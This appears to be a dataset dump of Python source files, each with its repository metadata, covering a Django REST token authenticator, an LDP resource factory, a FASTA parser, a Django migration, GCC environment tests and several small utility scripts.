script = pgq.cascade.admin.CascadeAdmin('cascade_admin', 'node_db', sys.argv[1:], worker_setup = False)
script.start()
| 0 | 0 | 0 |
efb102dfd9e2fff9e7cebc30a2150802d7069f10 | 1,369 | py | Python | src/dataloaderservices/auth.py | ODM2/ODM2DataSharingPortal | 4ea1d633fe8e1cc39916e83041f2dbc830339e55 | [
"BSD-3-Clause"
] | 18 | 2018-11-27T11:57:24.000Z | 2022-03-19T16:52:35.000Z | src/dataloaderservices/auth.py | ODM2/ODM2DataSharingPortal | 4ea1d633fe8e1cc39916e83041f2dbc830339e55 | [
"BSD-3-Clause"
] | 362 | 2018-02-21T16:27:00.000Z | 2022-03-31T18:48:48.000Z | src/dataloaderservices/auth.py | ODM2/ODM2DataSharingPortal | 4ea1d633fe8e1cc39916e83041f2dbc830339e55 | [
"BSD-3-Clause"
] | 5 | 2018-07-04T17:13:09.000Z | 2021-12-19T22:51:40.000Z | from rest_framework import authentication
from rest_framework import exceptions
from dataloaderinterface.models import SiteRegistration
| 42.78125 | 104 | 0.711468 | from rest_framework import authentication
from rest_framework import exceptions
from dataloaderinterface.models import SiteRegistration
class UUIDAuthentication(authentication.BaseAuthentication):
    """DRF authentication scheme validating a site-registration token.

    Expects a POST request carrying a ``TOKEN`` header and a
    ``sampling_feature`` UUID in the body, and checks that the
    SiteRegistration owning the token also owns that sampling feature.
    """
    def authenticate(self, request):
        # Only POSTs are subject to this check; for any other method we
        # return None so DRF falls through to the next authenticator.
        if request.META['REQUEST_METHOD'] != 'POST':
            return None
        if 'HTTP_TOKEN' not in request.META:
            raise exceptions.ParseError("Registration Token not present in the request.")
        elif 'sampling_feature' not in request.data:
            raise exceptions.ParseError("Sampling feature UUID not present in the request.")
        # Get auth_token(uuid) from header,
        # get registration object with auth_token,
        # get the user from that registration,
        # verify sampling_feature uuid is registered by this user,
        # be happy.
        token = request.META['HTTP_TOKEN']
        registration = SiteRegistration.objects.filter(registration_token=token).first()
        if not registration:
            raise exceptions.PermissionDenied('Invalid Security Token')
        # request needs to have the sampling feature uuid of the registration -
        if str(registration.sampling_feature.sampling_feature_uuid) != request.data['sampling_feature']:
            raise exceptions.AuthenticationFailed('Site Identifier is not associated with this Token')
        # NOTE(review): returns None even on success (no (user, auth) tuple),
        # so the request is never marked authenticated by this class --
        # confirm this validate-only behavior is intentional.
        return None
1514f9195fe3c618b0c34f004455c6fb3197fe14 | 7,436 | py | Python | lakesuperior/model/ldp_factory.py | mbklein/lakesuperior | 5829a337bfd4120c6a8fa65ff4cd219f8690210a | [
"Apache-2.0"
] | null | null | null | lakesuperior/model/ldp_factory.py | mbklein/lakesuperior | 5829a337bfd4120c6a8fa65ff4cd219f8690210a | [
"Apache-2.0"
] | null | null | null | lakesuperior/model/ldp_factory.py | mbklein/lakesuperior | 5829a337bfd4120c6a8fa65ff4cd219f8690210a | [
"Apache-2.0"
] | null | null | null | import logging
from pprint import pformat
from uuid import uuid4
from rdflib import Graph, parser, plugin, serializer
from rdflib.resource import Resource
from rdflib.namespace import RDF
from lakesuperior.model.ldpr import Ldpr
from lakesuperior.model.ldp_nr import LdpNr
from lakesuperior.model.ldp_rs import LdpRs, Ldpc, LdpDc, LdpIc
from lakesuperior.config_parser import config
from lakesuperior.env import env
from lakesuperior.dictionaries.namespaces import ns_collection as nsc
from lakesuperior.exceptions import (
IncompatibleLdpTypeError, InvalidResourceError, ResourceExistsError,
ResourceNotExistsError, TombstoneError)
LDP_NR_TYPE = nsc['ldp'].NonRDFSource
LDP_RS_TYPE = nsc['ldp'].RDFSource
rdfly = env.app_globals.rdfly
logger = logging.getLogger(__name__)
class LdpFactory:
'''
Generate LDP instances.
The instance classes are based on provided client data or on stored data.
'''
@staticmethod
@staticmethod
def from_stored(uid, repr_opts={}, **kwargs):
'''
Create an instance for retrieval purposes.
This factory method creates and returns an instance of an LDPR subclass
based on information that needs to be queried from the underlying
graph store.
N.B. The resource must exist.
@param uid UID of the instance.
'''
#logger.info('Retrieving stored resource: {}'.format(uid))
imr_urn = nsc['fcres'][uid]
rsrc_meta = rdfly.get_metadata(uid)
#logger.debug('Extracted metadata: {}'.format(
# pformat(set(rsrc_meta.graph))))
rdf_types = set(rsrc_meta.graph[imr_urn : RDF.type])
if LDP_NR_TYPE in rdf_types:
logger.info('Resource is a LDP-NR.')
rsrc = LdpNr(uid, repr_opts, **kwargs)
elif LDP_RS_TYPE in rdf_types:
logger.info('Resource is a LDP-RS.')
rsrc = LdpRs(uid, repr_opts, **kwargs)
else:
raise ResourceNotExistsError(uid)
# Sneak in the already extracted metadata to save a query.
rsrc._metadata = rsrc_meta
return rsrc
@staticmethod
def from_provided(uid, mimetype, stream=None, **kwargs):
'''
Determine LDP type from request content.
@param uid (string) UID of the resource to be created or updated.
@param mimetype (string) The provided content MIME type.
@param stream (IOStream | None) The provided data stream. This can be
RDF or non-RDF content, or None. In the latter case, an empty container
is created.
'''
uri = nsc['fcres'][uid]
if not stream:
# Create empty LDPC.
logger.info('No data received in request. '
'Creating empty container.')
inst = Ldpc(uid, provided_imr=Resource(Graph(), uri), **kwargs)
elif __class__.is_rdf_parsable(mimetype):
# Create container and populate it with provided RDF data.
input_rdf = stream.read()
gr = Graph().parse(data=input_rdf, format=mimetype, publicID=uri)
#logger.debug('Provided graph: {}'.format(
# pformat(set(provided_gr))))
provided_imr = Resource(gr, uri)
# Determine whether it is a basic, direct or indirect container.
if Ldpr.MBR_RSRC_URI in gr.predicates() and \
Ldpr.MBR_REL_URI in gr.predicates():
if Ldpr.INS_CNT_REL_URI in gr.predicates():
cls = LdpIc
else:
cls = LdpDc
else:
cls = Ldpc
inst = cls(uid, provided_imr=provided_imr, **kwargs)
# Make sure we are not updating an LDP-RS with an LDP-NR.
if inst.is_stored and LDP_NR_TYPE in inst.ldp_types:
raise IncompatibleLdpTypeError(uid, mimetype)
if kwargs.get('handling', 'strict') != 'none':
inst._check_mgd_terms(inst.provided_imr.graph)
else:
# Create a LDP-NR and equip it with the binary file provided.
provided_imr = Resource(Graph(), uri)
inst = LdpNr(uid, stream=stream, mimetype=mimetype,
provided_imr=provided_imr, **kwargs)
# Make sure we are not updating an LDP-NR with an LDP-RS.
if inst.is_stored and LDP_RS_TYPE in inst.ldp_types:
raise IncompatibleLdpTypeError(uid, mimetype)
logger.info('Creating resource of type: {}'.format(
inst.__class__.__name__))
try:
types = inst.types
except (TombstoneError, ResourceNotExistsError):
types = set()
return inst
@staticmethod
def is_rdf_parsable(mimetype):
'''
Checks whether a MIME type support RDF parsing by a RDFLib plugin.
@param mimetype (string) MIME type to check.
'''
try:
plugin.get(mimetype, parser.Parser)
except plugin.PluginException:
return False
else:
return True
@staticmethod
def is_rdf_serializable(mimetype):
'''
Checks whether a MIME type support RDF serialization by a RDFLib plugin
@param mimetype (string) MIME type to check.
'''
try:
plugin.get(mimetype, serializer.Serializer)
except plugin.PluginException:
return False
else:
return True
@staticmethod
def mint_uid(parent_uid, path=None):
'''
Mint a new resource UID based on client directives.
This method takes a parent ID and a tentative path and returns an LDP
resource UID.
This may raise an exception resulting in a 404 if the parent is not
found or a 409 if the parent is not a valid container.
@param parent_uid (string) UID of the parent resource. It must be an
existing LDPC.
@param path (string) path to the resource, relative to the parent.
@return string The confirmed resource UID. This may be different from
what has been indicated.
'''
if path and path.startswith('/'):
raise ValueError('Slug cannot start with a slash.')
# Shortcut!
if not path and parent_uid == '/':
return '/' + split_if_legacy(str(uuid4()))
if not parent_uid.startswith('/'):
raise ValueError('Invalid parent UID: {}'.format(parent_uid))
parent = LdpFactory.from_stored(parent_uid)
if nsc['ldp'].Container not in parent.types:
raise InvalidResourceError(parent_uid,
'Parent {} is not a container.')
pfx = parent_uid.rstrip('/') + '/'
if path:
cnd_uid = pfx + path
if not rdfly.ask_rsrc_exists(cnd_uid):
return cnd_uid
return pfx + split_if_legacy(str(uuid4()))
| 33.345291 | 79 | 0.612561 | import logging
from pprint import pformat
from uuid import uuid4
from rdflib import Graph, parser, plugin, serializer
from rdflib.resource import Resource
from rdflib.namespace import RDF
from lakesuperior.model.ldpr import Ldpr
from lakesuperior.model.ldp_nr import LdpNr
from lakesuperior.model.ldp_rs import LdpRs, Ldpc, LdpDc, LdpIc
from lakesuperior.config_parser import config
from lakesuperior.env import env
from lakesuperior.dictionaries.namespaces import ns_collection as nsc
from lakesuperior.exceptions import (
IncompatibleLdpTypeError, InvalidResourceError, ResourceExistsError,
ResourceNotExistsError, TombstoneError)
LDP_NR_TYPE = nsc['ldp'].NonRDFSource
LDP_RS_TYPE = nsc['ldp'].RDFSource
rdfly = env.app_globals.rdfly
logger = logging.getLogger(__name__)
class LdpFactory:
    '''
    Generate LDP instances.
    The instance classes are based on provided client data or on stored data.
    '''
    @staticmethod
    def new_container(uid):
        # Create an empty LDP container at *uid*. The UID must be absolute
        # (leading slash), must not be the repository root, and must not
        # already exist in the store.
        if not uid.startswith('/') or uid == '/':
            raise InvalidResourceError(uid)
        if rdfly.ask_rsrc_exists(uid):
            raise ResourceExistsError(uid)
        rsrc = Ldpc(uid, provided_imr=Resource(Graph(), nsc['fcres'][uid]))
        return rsrc
    @staticmethod
    def from_stored(uid, repr_opts={}, **kwargs):
        '''
        Create an instance for retrieval purposes.
        This factory method creates and returns an instance of an LDPR subclass
        based on information that needs to be queried from the underlying
        graph store.
        N.B. The resource must exist.
        @param uid UID of the instance.
        '''
        # NOTE(review): mutable default ``repr_opts={}`` is shared between
        # calls; safe only while no callee mutates it.
        #logger.info('Retrieving stored resource: {}'.format(uid))
        imr_urn = nsc['fcres'][uid]
        rsrc_meta = rdfly.get_metadata(uid)
        #logger.debug('Extracted metadata: {}'.format(
        #    pformat(set(rsrc_meta.graph))))
        # Pick the subclass from the stored rdf:type triples.
        rdf_types = set(rsrc_meta.graph[imr_urn : RDF.type])
        if LDP_NR_TYPE in rdf_types:
            logger.info('Resource is a LDP-NR.')
            rsrc = LdpNr(uid, repr_opts, **kwargs)
        elif LDP_RS_TYPE in rdf_types:
            logger.info('Resource is a LDP-RS.')
            rsrc = LdpRs(uid, repr_opts, **kwargs)
        else:
            raise ResourceNotExistsError(uid)
        # Sneak in the already extracted metadata to save a query.
        rsrc._metadata = rsrc_meta
        return rsrc
    @staticmethod
    def from_provided(uid, mimetype, stream=None, **kwargs):
        '''
        Determine LDP type from request content.
        @param uid (string) UID of the resource to be created or updated.
        @param mimetype (string) The provided content MIME type.
        @param stream (IOStream | None) The provided data stream. This can be
        RDF or non-RDF content, or None. In the latter case, an empty container
        is created.
        '''
        uri = nsc['fcres'][uid]
        if not stream:
            # Create empty LDPC.
            logger.info('No data received in request. '
                    'Creating empty container.')
            inst = Ldpc(uid, provided_imr=Resource(Graph(), uri), **kwargs)
        elif __class__.is_rdf_parsable(mimetype):
            # Create container and populate it with provided RDF data.
            input_rdf = stream.read()
            gr = Graph().parse(data=input_rdf, format=mimetype, publicID=uri)
            #logger.debug('Provided graph: {}'.format(
            #    pformat(set(provided_gr))))
            provided_imr = Resource(gr, uri)
            # Determine whether it is a basic, direct or indirect container.
            if Ldpr.MBR_RSRC_URI in gr.predicates() and \
                    Ldpr.MBR_REL_URI in gr.predicates():
                if Ldpr.INS_CNT_REL_URI in gr.predicates():
                    cls = LdpIc
                else:
                    cls = LdpDc
            else:
                cls = Ldpc
            inst = cls(uid, provided_imr=provided_imr, **kwargs)
            # Make sure we are not updating an LDP-RS with an LDP-NR.
            if inst.is_stored and LDP_NR_TYPE in inst.ldp_types:
                raise IncompatibleLdpTypeError(uid, mimetype)
            if kwargs.get('handling', 'strict') != 'none':
                inst._check_mgd_terms(inst.provided_imr.graph)
        else:
            # Create a LDP-NR and equip it with the binary file provided.
            provided_imr = Resource(Graph(), uri)
            inst = LdpNr(uid, stream=stream, mimetype=mimetype,
                    provided_imr=provided_imr, **kwargs)
            # Make sure we are not updating an LDP-NR with an LDP-RS.
            if inst.is_stored and LDP_RS_TYPE in inst.ldp_types:
                raise IncompatibleLdpTypeError(uid, mimetype)
        logger.info('Creating resource of type: {}'.format(
            inst.__class__.__name__))
        try:
            # NOTE(review): ``types`` is never used afterwards; the property
            # access only swallows tombstone/not-found errors here -- confirm
            # whether it has needed side effects before removing.
            types = inst.types
        except (TombstoneError, ResourceNotExistsError):
            types = set()
        return inst
    @staticmethod
    def is_rdf_parsable(mimetype):
        '''
        Checks whether a MIME type support RDF parsing by a RDFLib plugin.
        @param mimetype (string) MIME type to check.
        '''
        try:
            plugin.get(mimetype, parser.Parser)
        except plugin.PluginException:
            return False
        else:
            return True
    @staticmethod
    def is_rdf_serializable(mimetype):
        '''
        Checks whether a MIME type support RDF serialization by a RDFLib plugin
        @param mimetype (string) MIME type to check.
        '''
        try:
            plugin.get(mimetype, serializer.Serializer)
        except plugin.PluginException:
            return False
        else:
            return True
    @staticmethod
    def mint_uid(parent_uid, path=None):
        '''
        Mint a new resource UID based on client directives.
        This method takes a parent ID and a tentative path and returns an LDP
        resource UID.
        This may raise an exception resulting in a 404 if the parent is not
        found or a 409 if the parent is not a valid container.
        @param parent_uid (string) UID of the parent resource. It must be an
        existing LDPC.
        @param path (string) path to the resource, relative to the parent.
        @return string The confirmed resource UID. This may be different from
        what has been indicated.
        '''
        def split_if_legacy(uid):
            # Optionally split the UUID into a legacy pairtree-style path.
            # NOTE(review): ``tbox`` is not among the imports visible here --
            # presumably imported elsewhere in this module; verify.
            if config['application']['store']['ldp_rs']['legacy_ptree_split']:
                uid = tbox.split_uuid(uid)
            return uid
        if path and path.startswith('/'):
            raise ValueError('Slug cannot start with a slash.')
        # Shortcut!
        if not path and parent_uid == '/':
            return '/' + split_if_legacy(str(uuid4()))
        if not parent_uid.startswith('/'):
            raise ValueError('Invalid parent UID: {}'.format(parent_uid))
        parent = LdpFactory.from_stored(parent_uid)
        if nsc['ldp'].Container not in parent.types:
            raise InvalidResourceError(parent_uid,
                    'Parent {} is not a container.')
        pfx = parent_uid.rstrip('/') + '/'
        # Honor the client-provided slug only if that UID is still free;
        # otherwise fall back to a random UUID under the parent prefix.
        if path:
            cnd_uid = pfx + path
            if not rdfly.ask_rsrc_exists(cnd_uid):
                return cnd_uid
        return pfx + split_if_legacy(str(uuid4()))
| 424 | 0 | 56 |
a086032583a7d966871c93679168cd50ce9d2707 | 26 | py | Python | statsd/_version.py | chartbeat/pystatsd | ab3c7f9aba4c0f1f0a7a263993de3a8253e0cdcc | [
"MIT"
] | null | null | null | statsd/_version.py | chartbeat/pystatsd | ab3c7f9aba4c0f1f0a7a263993de3a8253e0cdcc | [
"MIT"
] | null | null | null | statsd/_version.py | chartbeat/pystatsd | ab3c7f9aba4c0f1f0a7a263993de3a8253e0cdcc | [
"MIT"
] | null | null | null | __version__ = '2.0.2.1cb'
| 13 | 25 | 0.653846 | __version__ = '2.0.2.1cb'
| 0 | 0 | 0 |
04450a1c0e6ce83470bf3314bdf0f34a37f44338 | 171 | py | Python | encrypt algorithm.py | okengfernando/py-scripts | acaff7ce916772755ad4a0a7c0d89f713a94e4eb | [
"MIT"
] | 1 | 2020-02-13T22:56:49.000Z | 2020-02-13T22:56:49.000Z | encrypt algorithm.py | okengfernando/py-scripts | acaff7ce916772755ad4a0a7c0d89f713a94e4eb | [
"MIT"
] | null | null | null | encrypt algorithm.py | okengfernando/py-scripts | acaff7ce916772755ad4a0a7c0d89f713a94e4eb | [
"MIT"
] | null | null | null |
ID = input("Enter your 11 digit account number:") # 04230647978
encry = "*" * 5
start_ID = ID[0:4]
end_ID = ID[9:]
final_ID = start_ID + encry + end_ID
print(final_ID)
| 19 | 64 | 0.666667 |
ID = input("Enter your 11 digit account number:") # 04230647978
encry = "*" * 5
start_ID = ID[0:4]
end_ID = ID[9:]
final_ID = start_ID + encry + end_ID
print(final_ID)
| 0 | 0 | 0 |
0b3f80d55e934d8cc2d271e1e34c42e2ac660fc2 | 603 | py | Python | newpy-project/q11.py | adya1612/py-work | 7514b2e0449732e5c0d9d68d29775a9e0b2210bb | [
"MIT"
] | null | null | null | newpy-project/q11.py | adya1612/py-work | 7514b2e0449732e5c0d9d68d29775a9e0b2210bb | [
"MIT"
] | null | null | null | newpy-project/q11.py | adya1612/py-work | 7514b2e0449732e5c0d9d68d29775a9e0b2210bb | [
"MIT"
] | 1 | 2021-08-28T15:16:19.000Z | 2021-08-28T15:16:19.000Z | # to count the number of positive and negative numbers
invoke_function()
| 23.192308 | 69 | 0.668325 | # to count the number of positive and negative numbers
def count_positive_and_negative(user_number):
    """Count and print the positive and negative numbers in *user_number*.

    :param user_number: whitespace-separated string of integers, e.g. "1 -2 3".
    :raises ValueError: if any token is not a valid integer.

    Zeros are neither positive nor negative, so they are excluded from both
    counts (the original ``else`` branch wrongly counted 0 as negative).
    """
    numbers = [int(token) for token in user_number.split()]
    positive_count = sum(1 for n in numbers if n > 0)
    negative_count = sum(1 for n in numbers if n < 0)
    print(f"Total positive numbers: {positive_count}")
    print(f"Total negative numbers: {negative_count}")
def invoke_function():
    """Prompt the user for a space-separated list of numbers and report how
    many are positive/negative via count_positive_and_negative()."""
    print("Enter the numbers. Hit SPACE. Don't hit ENTER.")
    count_positive_and_negative(input("Enter the list of numbers: "))
invoke_function()
| 481 | 0 | 46 |
bbdb121c9650c856b1714c4861200caf6dcad0f2 | 1,312 | py | Python | src/model/healper.py | arahmatiiii/user_political | 740277a982c85179ebd048fb984d64e608aefc76 | [
"MIT"
] | null | null | null | src/model/healper.py | arahmatiiii/user_political | 740277a982c85179ebd048fb984d64e608aefc76 | [
"MIT"
] | null | null | null | src/model/healper.py | arahmatiiii/user_political | 740277a982c85179ebd048fb984d64e608aefc76 | [
"MIT"
] | null | null | null | import torch
import itertools
from pytorch_lightning.callbacks import ModelCheckpoint
from data_preparation import token_padding, characters_padding
| 36.444444 | 107 | 0.679878 | import torch
import itertools
from pytorch_lightning.callbacks import ModelCheckpoint
from data_preparation import token_padding, characters_padding
def build_checkpoint_callback(save_top_k, monitor, mode, filename='QTag-{epoch:02d}-{val_loss:.2f}'):
    """Create a PyTorch Lightning ModelCheckpoint callback.

    :param save_top_k: keep only the k best checkpoints.
    :param monitor: name of the logged metric to track.
    :param mode: optimization direction for the monitored metric
        (e.g. 'min' or 'max').
    :param filename: checkpoint filename template.
    :return: the configured ModelCheckpoint instance.
    """
    # saves a file like: input/QTag-epoch=02-val_loss=0.32.ckpt
    checkpoint_callback = ModelCheckpoint(
        monitor=monitor,  # monitored quantity
        filename=filename,
        save_top_k=save_top_k,  # save the top k models
        mode=mode,  # mode of the monitored quantity for optimization
    )
    return checkpoint_callback
def pad_collator(batch, pad_idx):
    """Collate a list of per-sample dicts into a dict of padded tensors.

    Keys containing 'target' are flattened across the batch into one
    tensor; keys containing 'char' go through character-level padding and
    become a list of tensors (one per sample); every other key goes
    through token-level padding into a single tensor. Padding positions
    are filled with *pad_idx*.
    """
    collated = {}
    for key in batch[0].keys():
        values = [sample[key] for sample in batch]
        if 'target' in key:
            flat = list(itertools.chain.from_iterable(values))
            collated[key] = torch.tensor(flat)
        elif 'char' in key:
            padded = characters_padding(values, pad_index=pad_idx)
            collated[key] = [torch.tensor(chars) for chars in padded]
        else:
            padded = token_padding(values, pad_index=pad_idx)
            collated[key] = torch.tensor(padded)
    return collated
| 1,114 | 0 | 46 |
fa19d12dca6a816223eb3a8485a272181647d560 | 2,629 | py | Python | accelerator/migrations/0017_add_required_name.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | 6 | 2017-06-14T19:34:01.000Z | 2020-03-08T07:16:59.000Z | accelerator/migrations/0017_add_required_name.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | 160 | 2017-06-20T17:12:13.000Z | 2022-03-30T13:53:12.000Z | accelerator/migrations/0017_add_required_name.py | masschallenge/django-accelerator | 8af898b574be3b8335edc8961924d1c6fa8b5fd5 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.10 on 2020-04-08 11:18
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
| 33.278481 | 74 | 0.586535 | # Generated by Django 2.2.10 on 2020-04-08 11:18
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Alter Program/ProgramCycle fields (accelerator 0017).

    Date and char fields are redeclared with one-off defaults
    (``preserve_default=False``) so existing rows can be backfilled, and the
    two ForeignKeys are redeclared as nullable with CASCADE delete and
    explicit related names.
    """
    dependencies = [
        ('accelerator', '0016_make_user_role_name_unique'),
    ]
    operations = [
        # Program.cycle -> nullable FK to the configured ProgramCycle model.
        migrations.AlterField(
            model_name='program',
            name='cycle',
            field=models.ForeignKey(
                null=True,
                on_delete=django.db.models.deletion.CASCADE,
                related_name='programs',
                to=settings.ACCELERATOR_PROGRAMCYCLE_MODEL
            ),
        ),
        migrations.AlterField(
            model_name='program',
            name='end_date',
            field=models.DateTimeField(default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='program',
            name='location',
            field=models.CharField(default='', max_length=50),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='program',
            name='start_date',
            field=models.DateTimeField(default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='programcycle',
            name='advertised_final_deadline',
            field=models.DateTimeField(default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='programcycle',
            name='application_final_deadline_date',
            field=models.DateTimeField(default=django.utils.timezone.now),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='programcycle',
            name='application_open_date',
            field=models.DateTimeField(default=django.utils.timezone.now),
            preserve_default=False,
        ),
        # ProgramCycle.default_application_type -> nullable FK to the
        # configured ApplicationType model.
        migrations.AlterField(
            model_name='programcycle',
            name='default_application_type',
            field=models.ForeignKey(
                null=True,
                on_delete=django.db.models.deletion.CASCADE,
                related_name='application_type_for',
                to=settings.ACCELERATOR_APPLICATIONTYPE_MODEL
            ),
        ),
        migrations.AlterField(
            model_name='programcycle',
            name='short_name',
            field=models.CharField(default='', max_length=32),
            preserve_default=False,
        ),
    ]
| 0 | 2,419 | 23 |
e47bcb6f461f04971bd42b6d1f461b2e19c67c15 | 4,236 | py | Python | scripts/chimera_lib/fasta.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | scripts/chimera_lib/fasta.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | scripts/chimera_lib/fasta.py | dekkerlab/chimera-tie | ff9e1fe090ac9356b37e552457fdc868b659d6b2 | [
"Apache-2.0"
] | null | null | null | from sys import stdin
### Fasta Reading Functions ###############
#################################################################################################################
#################################################################################################################
| 35.3 | 118 | 0.493154 | from sys import stdin
### Fasta Reading Functions ###############
class FastaEntry:
    """A single FASTA record: a header line and its nucleotide sequence."""

    # Canonical base-pair complements; case is preserved and N maps to itself.
    _COMPLEMENTS = {"A": "T", "a": "t",
                    "C": "G", "c": "g",
                    "G": "C", "g": "c",
                    "T": "A", "t": "a",
                    "N": "N", "n": "n"}

    def __init__(self, header, sequence):
        """Store *header* (a leading '>' is stripped) and *sequence*."""
        if header.startswith(">"):
            header = header[1:]
        self.header = header
        self.sequence = sequence

    def reverse_complement(self):
        """Replace self.sequence with its reverse complement, in place.

        :raises IOError: if the sequence contains a character outside the
            recognised nucleotide codes (ACGTN, either case).
        """
        result = []
        for base in reversed(self.sequence):
            try:
                result.append(self._COMPLEMENTS[base])
            # Bug fix: a dict lookup on an unknown character raises KeyError,
            # not IndexError, so the original handler never fired and invalid
            # characters escaped as bare KeyErrors instead of IOError.
            except KeyError:
                error_message = "Invalid character (%s) in the fasta sequence with header \n" \
                                "%s" % (base, self.header)
                raise IOError(error_message)
        self.sequence = "".join(result)

    def __str__(self):
        """Render the record in FASTA format, wrapping the sequence at 50
        characters per line."""
        chunk_size = 50
        result_list = [">" + self.header]
        for start in range(0, len(self.sequence), chunk_size):
            result_list.append(self.sequence[start:start + chunk_size])
        return "\n".join(result_list)
#################################################################################################################
class FastaFile:
    """Sequential reader of FASTA entries from a file or stdin.

    Iteration is driven through the legacy ``__getitem__`` protocol: each
    call parses lines until one full entry is complete and returns it as a
    FastaEntry; ``raise IndexError`` signals exhaustion to ``for`` loops.
    """
    def __init__(self , file):
        # Fall back to stdin when no filename is given.
        if(file):
            self.f = open(file , "r")
        else:
            self.f = stdin
        # Parser state carried across successive __getitem__ calls.
        self.current_header = ""
        self.current_sequence = list()
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        # Cleanup is deferred to __del__, which closes the handle.
        pass
    def __getitem__(self, index):
        # The *index* argument is ignored; entries come back in file order.
        for raw_line in self.f:
            line = raw_line.strip()
            if not line:
                # NOTE(review): a blank line returns the current entry without
                # resetting the parser state -- presumably blank lines occur
                # only at end of file; confirm behavior for mid-file blanks.
                this_entry = FastaEntry(header = self.current_header , sequence = "".join(self.current_sequence) )
                return(this_entry)
            if line[0] == ">":
                if not self.current_header:
                    # First header seen: start accumulating its sequence.
                    self.current_header = line
                    self.current_sequence = list()
                else:
                    # New header: the previous entry is complete -- emit it.
                    this_entry = FastaEntry(header = self.current_header , sequence = "".join(self.current_sequence) )
                    self.current_header = line
                    self.current_sequence = list()
                    return(this_entry)
            else:
                self.current_sequence.append(line)
        # this returns the last entry
        if len(self.current_sequence) > 0:
            this_entry = FastaEntry(header = self.current_header , sequence = "".join(self.current_sequence) )
            self.current_sequence = list()
            return(this_entry)
        raise IndexError
    def __del__(self):
        # NOTE(review): this also closes stdin when no file was given; verify
        # that is acceptable for callers.
        self.f.close()
def reverse_complement(input_sequence):
    """Return the reverse complement of *input_sequence* as a new string.

    Case is preserved and 'N'/'n' map to themselves.

    :raises IOError: on any character outside the recognised nucleotide
        codes (ACGTN, either case).
    """
    complements = {"A" : "T" , "a" : "t" ,
                   "C" : "G" , "c" : "g" ,
                   "G" : "C" , "g" : "c" ,
                   "T" : "A" , "t" : "a" ,
                   "N" : "N" , "n" : "n"}
    result = list()
    for base in reversed(input_sequence):
        try:
            result.append(complements[base])
        # Bug fix: an unknown character raises KeyError from the dict lookup,
        # not IndexError, so the old handler never ran.
        except KeyError:
            error_message = "Invalid character (%s) in the sequence "\
                %(base)
            raise IOError(error_message)
    return "".join(result)
| 3,659 | -9 | 283 |
3cdc8e1b34c40a84ac79c2f751d330fd05a93c4e | 164 | py | Python | preprocess/test.py | dyy401453043/IRNet | d1c6f8df4646ca40a3c0317076a84e8cdb83870f | [
"MIT"
] | null | null | null | preprocess/test.py | dyy401453043/IRNet | d1c6f8df4646ca40a3c0317076a84e8cdb83870f | [
"MIT"
] | null | null | null | preprocess/test.py | dyy401453043/IRNet | d1c6f8df4646ca40a3c0317076a84e8cdb83870f | [
"MIT"
] | null | null | null | import nltk
from nltk import data
data.path.append(r'D:\NL2SQL\nltk_data')
#from nltk.book import *
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle') | 20.5 | 61 | 0.768293 | import nltk
from nltk import data
data.path.append(r'D:\NL2SQL\nltk_data')
#from nltk.book import *
tokenizer = nltk.data.load('tokenizers/punkt/english.pickle') | 0 | 0 | 0 |
860932d4156ec08484ca83dfffd810bd32c8411f | 1,004 | py | Python | tests/gcc/gcc_bin_test.py | sahirgomez1/CompilerGym | 9987fbdfcf8ac9af076baf0ffd695e48f0e804cf | [
"MIT"
] | 562 | 2020-12-21T14:10:20.000Z | 2022-03-31T21:23:55.000Z | tests/gcc/gcc_bin_test.py | sahirgomez1/CompilerGym | 9987fbdfcf8ac9af076baf0ffd695e48f0e804cf | [
"MIT"
] | 433 | 2020-12-22T03:40:41.000Z | 2022-03-31T18:16:17.000Z | tests/gcc/gcc_bin_test.py | sahirgomez1/CompilerGym | 9987fbdfcf8ac9af076baf0ffd695e48f0e804cf | [
"MIT"
] | 88 | 2020-12-22T08:22:00.000Z | 2022-03-20T19:00:40.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Tests for the GCC CompilerGym service."""
import gym
import pytest
import compiler_gym.envs.gcc # noqa register environments
from compiler_gym.service import ServiceError
from tests.pytest_plugins.gcc import with_system_gcc, without_system_gcc
from tests.test_main import main
@with_system_gcc
@without_system_gcc
if __name__ == "__main__":
main()
| 25.74359 | 72 | 0.734064 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Tests for the GCC CompilerGym service."""
import gym
import pytest
import compiler_gym.envs.gcc # noqa register environments
from compiler_gym.service import ServiceError
from tests.pytest_plugins.gcc import with_system_gcc, without_system_gcc
from tests.test_main import main
def test_missing_gcc_bin():
    """gym.make() must raise ServiceError for a nonexistent gcc binary path."""
    with pytest.raises(ServiceError):
        gym.make("gcc-v0", gcc_bin="not-a-real-file")
def test_invalid_gcc_bin():
    """gym.make() must raise ServiceError when gcc_bin is an executable
    ('false') that is not actually GCC."""
    with pytest.raises(ServiceError):
        gym.make("gcc-v0", gcc_bin="false")
@with_system_gcc
def test_system_gcc():
    """With a system GCC available, the environment reports it in
    compiler_version."""
    with gym.make("gcc-v0", gcc_bin="gcc") as env:
        assert "gcc" in env.compiler_version
@without_system_gcc
def test_missing_system_gcc():
    """Without a system GCC, making the env with gcc_bin='gcc' must raise
    ServiceError."""
    with pytest.raises(ServiceError):
        gym.make("gcc-v0", gcc_bin="gcc")
if __name__ == "__main__":
main()
| 372 | 0 | 90 |
